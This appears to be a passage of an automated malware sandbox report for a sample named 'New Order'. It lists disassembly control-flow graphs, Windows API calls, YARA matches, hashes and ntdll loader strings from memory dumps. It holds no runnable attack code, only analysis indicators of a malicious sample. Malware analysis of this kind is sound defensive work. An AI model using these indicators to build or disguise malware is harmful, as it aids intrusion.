                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                              • Instruction ID: 81c19f638b1a6f09e02ea30b66326b995be5007b2a54d46542b911e8a6f9f34d
                                                                                                                              • Opcode Fuzzy Hash: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                              • Instruction Fuzzy Hash: 6090023120148806D2517159840474A0405D7D1301F59C412B9428658DC6958A957622

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 222 18435c0-18435cc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                              • Instruction ID: 117b82ad7d38cf1d61cb8c5dbec7175b0790706f6d6352d20b33bb99b9478477
                                                                                                                              • Opcode Fuzzy Hash: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                              • Instruction Fuzzy Hash: DC90023160550406D241715945147061405D7D1301F65C412B5428568DC7958B556AA3

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: 6a8d577d45a69f71e0f769b85b49836f697ac926eeab2c36fc6fdfe997539058
                                                                                                                              • Instruction ID: d7c6e6f493b6cacc433219392afa6664265d2d2ebd78ae85f7d082005cb4961d
                                                                                                                              • Opcode Fuzzy Hash: 6a8d577d45a69f71e0f769b85b49836f697ac926eeab2c36fc6fdfe997539058
                                                                                                                              • Instruction Fuzzy Hash: EF1148B1E4021C7FDB10AAE18C81DEFBB7CEF81398F44806AFA0467241D6784E074BA1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 15 4146a3-4146b5 16 4146bd-41470d call 42fa33 call 417ea3 call 404563 call 4255f3 15->16 17 4146b8 call 42f023 15->17 27 41472d-414733 16->27 28 41470f-41471e PostThreadMessageW 16->28 17->16 28->27 29 414720-41472a 28->29 29->27
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: 88167b4b0e0f4911031dca335308b3dd1a82ee8967a2be2bf5f627821195a5ed
                                                                                                                              • Instruction ID: 3403a82410ff221ad088098878012c6b4d0d4f3bb5f81acc2e425cddafea4f19
                                                                                                                              • Opcode Fuzzy Hash: 88167b4b0e0f4911031dca335308b3dd1a82ee8967a2be2bf5f627821195a5ed
                                                                                                                              • Instruction Fuzzy Hash: D801D6B1D0021C7ADB10AAE69C81DEF7B7CDF81398F448069FA1477241D6784E064BB5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 30 414687-414689 31 41468b 30->31 32 4146ed-41470d 30->32 33 4146eb-4146ec call 4255f3 31->33 34 41468d-414694 31->34 35 41472d-414733 32->35 36 41470f-41471e PostThreadMessageW 32->36 33->32 36->35 38 414720-41472a 36->38 38->35
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 0041471A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction ID: ac3a77325ec5a8b173158eaa0a57e9d6c8c1764d7cbb0e1981d5f763b3243d9a
                                                                                                                              • Opcode Fuzzy Hash: d795545927a22455678fa0872e1fea9e5c9b1c9197e5258a3012aeee406cec4a
                                                                                                                              • Instruction Fuzzy Hash: 66F02BB6E0011C77DB108AD96C828FEBBFCEF42369B008097EE18E7200E6394E424755

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 39 42d1f3-42d237 call 4045f3 call 42e0c3 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D232
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID: kA
                                                                                                                              • API String ID: 3298025750-1675843574
                                                                                                                              • Opcode ID: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction ID: b80717368bfedfa27545dbd93d5e703a2b9f3feff49327d32bdfe24bb3b3f875
                                                                                                                              • Opcode Fuzzy Hash: b0370a9810f3f8ae3eb76438a2bc4b3b9f7bad70dade675c6b0081f2d3febe89
                                                                                                                              • Instruction Fuzzy Hash: 54E06DB16003147BD614EE5AEC41F9B37ADEFC5714F004419FA08A7241CA71BA118AB9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 200 42d1a3-42d1e7 call 4045f3 call 42e0c3 RtlAllocateHeap
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EC94,?,?,00000000,?,0041EC94,?,?,?), ref: 0042D1E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279760036-0
                                                                                                                              • Opcode ID: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction ID: 2c8bf0c60d6b96f775a2a06d48232a77e81817fba3b295a8a9d5edad12f6c3f5
                                                                                                                              • Opcode Fuzzy Hash: 819e4ba01922608b8a6837657b59129ea6c623089a9d8f2795ada48a4572b4eb
                                                                                                                              • Instruction Fuzzy Hash: AAE092B12012147FD710EF5AEC41F9B37ACEFC5714F004419FA08A7241C675B9118BB9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 210 42d243-42d27c call 4045f3 call 42e0c3 ExitProcess
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,A5EDBFDD,?,?,A5EDBFDD), ref: 0042D277
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              • Opcode ID: aeb524251ed94e55e124870c8877361103843cc1e75ac7e070985781bddcad94
                                                                                                                              • Instruction ID: fc274d900b57d9b3bd4208e4de6903eaec1a9dcb04b3927166d03e589a874e4b
                                                                                                                              • Opcode Fuzzy Hash: aeb524251ed94e55e124870c8877361103843cc1e75ac7e070985781bddcad94
                                                                                                                              • Instruction Fuzzy Hash: 7EE046362142147BE620AA6ADC41FDB77ACEFC5714F00481AFA1CA7241CAB5BA018AB5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 215 1842c0a-1842c0f 216 1842c11-1842c18 215->216 217 1842c1f-1842c26 LdrInitializeThunk 215->217
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                              • Instruction ID: f63c336f628adabc7766a7891f16d9a29cf4172be41f5933b5ba880c2356e11a
                                                                                                                              • Opcode Fuzzy Hash: 510223f9b684263e23cff47cb3a62f0273c34362a4d0a0e50aaf7bc620a89aec
                                                                                                                              • Instruction Fuzzy Hash: FAB09B719055C5CADB52E76456087177D01B7D1701F15C062F3034641F4778C2D5E676
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              • Opcode ID: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                              • Instruction ID: 3a9b0cc0427d0df2a14293f6f5d242b8b8a7194cd92d474c90adc91f8f135f08
                                                                                                                              • Opcode Fuzzy Hash: 18e644847a58b5706c89d0af11a18b2afdd5ac5e8aaa6f3194466662fc16a83c
                                                                                                                              • Instruction Fuzzy Hash: 7E929E71608746AFE721EE18C880F6BBBEABF84714F04491DFA94D7251D770EA44CB92
                                                                                                                              Strings
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                              • Critical section address., xrefs: 01875502
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                              • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                              • 8, xrefs: 018752E3
                                                                                                                              • Thread identifier, xrefs: 0187553A
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                              • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                              • corrupted critical section, xrefs: 018754C2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                              • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                              • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                              • API String ID: 0-2368682639
                                                                                                                              • Opcode ID: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                              • Instruction ID: 2a64b600bfecb6cb10e453c75b3711a886c9e7cfd89062f14c4d945452d5e545
                                                                                                                              • Opcode Fuzzy Hash: 15d2795863d36c00180f773a96c4fa5aad9387f44a49c1add55e36465a96a638
                                                                                                                              • Instruction Fuzzy Hash: D5818AB1A00358AFDB20CF99C888BAEBBF5FB49704F244119F504F7290D775AA40CBA1
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 0187259B
                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                              • API String ID: 0-4009184096
                                                                                                                              • Opcode ID: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                              • Instruction ID: 1fcff6de5e3dc45206aea32cd901f1b5a19f023bf95e1bdd9f590786cd41b9fa
                                                                                                                              • Opcode Fuzzy Hash: 6658687bd448ec4ed070cd630c34b583261879bc04b5175e1e5fe6e92cb34757
                                                                                                                              • Instruction Fuzzy Hash: B5025EF1D002299BDB31DB58CC80B9AB7B9AF54314F0441EAA709E7241EB709F85CF99
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                              • API String ID: 0-2515994595
                                                                                                                              • Opcode ID: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                              • Instruction ID: 39e838fb673d6d672de22f6b4c706f95462bfa113cfb183e21c77aaef7ec4efc
                                                                                                                              • Opcode Fuzzy Hash: 5ddb97e52f3772710528a89382de8eb2abefe6c2ec9b41822bf8508372b97659
                                                                                                                              • Instruction Fuzzy Hash: 5351D4715043199BE329DF188844BABBBE8FF95345F94492DEA98C3241E770D704CBE2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                              • API String ID: 0-1700792311
                                                                                                                              • Opcode ID: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                              • Instruction ID: 859cb674908ac2eef1143725e93dc3c5a07eec04c7b365b4ae0a32049fd2cf57
                                                                                                                              • Opcode Fuzzy Hash: 7ef7f6a00d67fe89e056131a48dd82c59f619a4670aa4183f7d243ebee1cf1d0
                                                                                                                              • Instruction Fuzzy Hash: 18D1973150068ADFDB26DF68C494AAAFBB1FF4A714F18805DE545DB752C734AA81CB10
                                                                                                                              Strings
                                                                                                                              • VerifierFlags, xrefs: 01888C50
                                                                                                                              • HandleTraces, xrefs: 01888C8F
                                                                                                                              • VerifierDlls, xrefs: 01888CBD
                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                              • VerifierDebug, xrefs: 01888CA5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                              • API String ID: 0-3223716464
                                                                                                                              • Opcode ID: 002c45b3c815893ac42de48a4761c9c24ec70dab306bc85ff33135212728f912
                                                                                                                              • Instruction ID: 86d167db8fb8a742154ef48f61797d69bf41cca6811139c61f135857116ca555
                                                                                                                              • Opcode Fuzzy Hash: 002c45b3c815893ac42de48a4761c9c24ec70dab306bc85ff33135212728f912
                                                                                                                              • Instruction Fuzzy Hash: 7C912571A41716AFD721FF2C8880F2ABBE5AB95B14F84051CFA45EB285D7309F05CB92
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                              • API String ID: 0-1109411897
                                                                                                                              • Opcode ID: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                              • Instruction ID: c07c390a3c6dfbf29324c0bca05efaa3398fec3e888a216040f036157caa9eaf
                                                                                                                              • Opcode Fuzzy Hash: 32f246818066da27cee826ba8e307de05f091c164f34eea90c284c00c3bb4561
                                                                                                                              • Instruction Fuzzy Hash: 30A21874A0562E8BDBA5DF18CD887AEBBB5AF45304F1482D9D909E7291DB319F81CF00
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-792281065
                                                                                                                              • Opcode ID: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                              • Instruction ID: 22d797bdd79ad271d2752c5e256f1535f2b1e9727251a7407f52030bd7f64da2
                                                                                                                              • Opcode Fuzzy Hash: 997da582d42541fd5fe7daefee38791df5e6c21fa84a46ffae9a9d1c26542179
                                                                                                                              • Instruction Fuzzy Hash: 33910A70F01715ABDB25EF5CE884BA97BA5BB51B14F28012CEA10E7281EB74DB41CBD1
                                                                                                                              Strings
                                                                                                                              • apphelp.dll, xrefs: 017F6496
                                                                                                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                              • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-204845295
                                                                                                                              • Opcode ID: e168b5557a73285cbab1ea75fda1ad78b65ae5a44024752c453d9b89b8c4d4fc
                                                                                                                              • Instruction ID: 45abd722557eac7fb01146992cf59eea35ddbec73e6a168bd292d6d2ef480730
                                                                                                                              • Opcode Fuzzy Hash: e168b5557a73285cbab1ea75fda1ad78b65ae5a44024752c453d9b89b8c4d4fc
                                                                                                                              • Instruction Fuzzy Hash: 1E519071608305DFE721DB28C855F6BB7E8EB84748F10092DFA85D7265E730EA04CBA2
                                                                                                                              Strings
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                              • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-475462383
                                                                                                                              • Opcode ID: 0cf71ec913d9ad5e523573c75b6ab9bec5f1c1e2602d6411294d36895fe092ad
                                                                                                                              • Instruction ID: eac7775799f442356901d87fcd6e340a5ed83366a1140dbbe6d523d3a1e04860
                                                                                                                              • Opcode Fuzzy Hash: 0cf71ec913d9ad5e523573c75b6ab9bec5f1c1e2602d6411294d36895fe092ad
                                                                                                                              • Instruction Fuzzy Hash: 0931E4B16487469BC224EB2CD949E1AB7E5EF94B14F04056CF941EB291EB60EE04C7A3
                                                                                                                              Strings
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01872180
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01872178
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01872165
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              • API String ID: 0-861424205
                                                                                                                              • Opcode ID: d741695dd3569e4fa90a579681ae9a34670d743557c2248cea26c83e55b5e217
